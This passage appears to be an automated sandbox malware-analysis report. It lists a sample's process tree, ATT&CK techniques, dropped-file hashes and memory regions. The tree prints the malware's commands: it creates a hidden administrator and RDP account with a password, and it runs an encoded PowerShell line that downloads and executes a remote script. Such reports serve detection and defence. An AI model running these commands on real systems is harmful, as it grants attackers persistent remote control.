C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" UMLCWGSL$ /ADD
1⤵
PID:4644
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" UMLCWGSL$ /ADD
  2⤵
  PID:8
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" UMLCWGSL$ /ADD
    3⤵
    PID:2088

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:4492
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:1672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:4944

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc S6iPiumh
1⤵
PID:2388
- C:\Windows\system32\net.exe
  net.exe user wgautilacc S6iPiumh
  2⤵
  PID:2248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc S6iPiumh
    3⤵
    PID:4024

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:3776
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:3480

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2312
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2720

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:3272
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:4104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES7129.tmp

Filesize
1KB

MD5
cd49da3c422580406ea1b80ed35addcd

SHA1
4b3b7ba6fbd45958f6992e7577af0461e4b819b2

SHA256
88c5fe89d54b9c96ec644f1fee2c178039e7905fdb6459b4dc6e027bea3e93f8

SHA512
d27f776862a0d8c0ffb4b41cbd01815bae9826cb83cbd995bf26c3e1b6eadef392a05a50e677b80697c0011930a3e54b91912fe3297d131b6aa9db11c56af0f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iahsx3wc.zeo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\sf05lkeh\sf05lkeh.dll

Filesize
3KB

MD5
2940bbb70f5139e4e48bc16a939d4480

SHA1
bf4fdebccaa3647cbe4e09a271b4640be31effb8

SHA256
0fe95727e9b36555c363bb40f46803b03d995d4d6d16e649402e0d3f1ea17d5f

SHA512
5fd4f7eff93487d11a01ab661d3f59d448177f8edb4a75bf177a4d73abf06cba99bcb693177598fc1292732f1b60d1cc4b5ef2cf32369785d90632b6ede9cbb0

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
4a7f528c1fc75b95fc6fe1c9ffb83464

SHA1
8da176ae1b55b8c7756a7b4ff12e834d8c9889d3

SHA256
6bf000d70e74a91b0b4c0dd42e2fe0dbe265e883a55f5006312e62d78e4f7c5e

SHA512
0aa868a72de36b587c19dbc0b6bdcc25f37050066c4db220b90c0c04285f5c138b58f74722d80036438ea0caff920de7b57146050ba97686975c2313729c6a6f

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
565bd8e5b433c887de8ba7538cb3a3df

SHA1
8dff8bc8d9006db4491a02f1384bd4a2e7126f7d

SHA256
6b3f915f21ee22da770e2516a1f3b852d6623f7e745fc42884712cac2cbe2a14

SHA512
122b6606b5daacae5235137ffc3dc21c7f754b2362cfdd04cc44e6b311252cf0dc89028faba3e6747ef0f19fec5a46dda04fdca095b46110ac25767da8f5b4ca

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC11E.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sf05lkeh\CSC5F55EBD4B70F4F4BB0172FD09F45947A.TMP

Filesize
652B

MD5
f559b167b87bdc61c6167cb1d01dc0f4

SHA1
f31102fd0ef7a97370bb1a5560ef8d7e1aad9d67

SHA256
edccc897402175951b11adc6db3317203724e172946e0ccad4e4dcd566806e2a

SHA512
cef1331b88e3f28384ce3a05e9cb3265e94c0bbc28e6ca85909879a8eadf0b4b327e0776a0cf4f1c71633f5fd47d4796d672ffcbd0e4a2097c8b2b383cab8d0b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sf05lkeh\sf05lkeh.0.cs

Filesize
506B

MD5
fe552aa471e3747e57ddeff23d6da1fc

SHA1
16832293206ec339d47940533443f4fb375826fa

SHA256
60122a8ad7d370fa8dd0ca1b65f1b7685128c526195ac2ffb4edab103d45208d

SHA512
8cc715d2ad259d557b818e86b9fab2f91186ca4b1cde477218c0943313ec587d87499288598a2c64969fe2ee6eaf2132c269869f6a7201cf82100620d3ce34e6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sf05lkeh\sf05lkeh.cmdline

Filesize
369B

MD5
359ca923733c8a22f90e6ee619e377d7

SHA1
6eb622c5e1b653da9c8afd6cdd0bbae43606a5d5

SHA256
4d8085e7e4e6fe4c4fd639c81e1608f2bce27346c79e4201563e96e2051e9199

SHA512
356d17b68a34797b25d23082eef9788e420fc7db5d9fd2ad0e24023efe601aed3def6e8027c1c8377758d4738009c15f8c4931cc0aa2bf46593edd3a60bbc66f

Download Submit
memory/1408-40-0x000001936FE30000-0x000001936FE40000-memory.dmp

Filesize
64KB

Download
memory/1408-42-0x00007FFC709A0000-0x00007FFC71461000-memory.dmp

Filesize
10.8MB

Download
memory/1408-41-0x000001936FE30000-0x000001936FE40000-memory.dmp

Filesize
64KB

Download
memory/1408-38-0x00007FFC709A0000-0x00007FFC71461000-memory.dmp

Filesize
10.8MB

Download
memory/1408-39-0x000001936FE30000-0x000001936FE40000-memory.dmp

Filesize
64KB

Download
memory/1880-73-0x0000016B1C5E0000-0x0000016B1C5F0000-memory.dmp

Filesize
64KB

Download
memory/1880-9-0x0000016B1C590000-0x0000016B1C5B2000-memory.dmp

Filesize
136KB

Download
memory/1880-27-0x0000016B1ECE0000-0x0000016B1EE56000-memory.dmp

Filesize
1.5MB

Download
memory/1880-142-0x00007FFC7A1A0000-0x00007FFC7A1B9000-memory.dmp

Filesize
100KB

Download
memory/1880-44-0x00007FFC709A0000-0x00007FFC71461000-memory.dmp

Filesize
10.8MB

Download
memory/1880-141-0x00007FFC709A0000-0x00007FFC71461000-memory.dmp

Filesize
10.8MB

Download
memory/1880-55-0x0000016B1C5E0000-0x0000016B1C5F0000-memory.dmp

Filesize
64KB

Download
memory/1880-138-0x0000016B1C5E0000-0x0000016B1C5F0000-memory.dmp

Filesize
64KB

Download
memory/1880-10-0x00007FFC709A0000-0x00007FFC71461000-memory.dmp

Filesize
10.8MB

Download
memory/1880-11-0x0000016B1C5E0000-0x0000016B1C5F0000-memory.dmp

Filesize
64KB

Download
memory/1880-12-0x0000016B1C5E0000-0x0000016B1C5F0000-memory.dmp

Filesize
64KB

Download
memory/1880-25-0x0000016B04060000-0x0000016B04068000-memory.dmp

Filesize
32KB

Download
memory/1880-72-0x00007FFC7A1A0000-0x00007FFC7A1B9000-memory.dmp

Filesize
100KB

Download
memory/1880-28-0x0000016B1F070000-0x0000016B1F27A000-memory.dmp

Filesize
2.0MB

Download
memory/2028-102-0x00000285F4760000-0x00000285F4770000-memory.dmp

Filesize
64KB

Download
memory/2028-103-0x00000285F4760000-0x00000285F4770000-memory.dmp

Filesize
64KB

Download
memory/2028-104-0x00000285F4760000-0x00000285F4770000-memory.dmp

Filesize
64KB

Download
memory/2028-101-0x00007FFC709A0000-0x00007FFC71461000-memory.dmp

Filesize
10.8MB

Download
memory/2028-137-0x00007FFC709A0000-0x00007FFC71461000-memory.dmp

Filesize
10.8MB

Download
memory/4492-71-0x00007FFC709A0000-0x00007FFC71461000-memory.dmp

Filesize
10.8MB

Download
memory/4492-70-0x0000012067F90000-0x0000012067FA0000-memory.dmp

Filesize
64KB

Download
memory/4492-60-0x0000012067F90000-0x0000012067FA0000-memory.dmp

Filesize
64KB

Download
memory/4492-59-0x0000012067F90000-0x0000012067FA0000-memory.dmp

Filesize
64KB

Download
memory/4492-58-0x00007FFC709A0000-0x00007FFC71461000-memory.dmp

Filesize
10.8MB

Download
memory/5064-57-0x00007FFC709A0000-0x00007FFC71461000-memory.dmp

Filesize
10.8MB

Download
memory/5064-56-0x0000019EC5510000-0x0000019EC5520000-memory.dmp

Filesize
64KB

Download
memory/5064-45-0x0000019EC5510000-0x0000019EC5520000-memory.dmp

Filesize
64KB

Download
memory/5064-43-0x00007FFC709A0000-0x00007FFC71461000-memory.dmp

Filesize
10.8MB

Download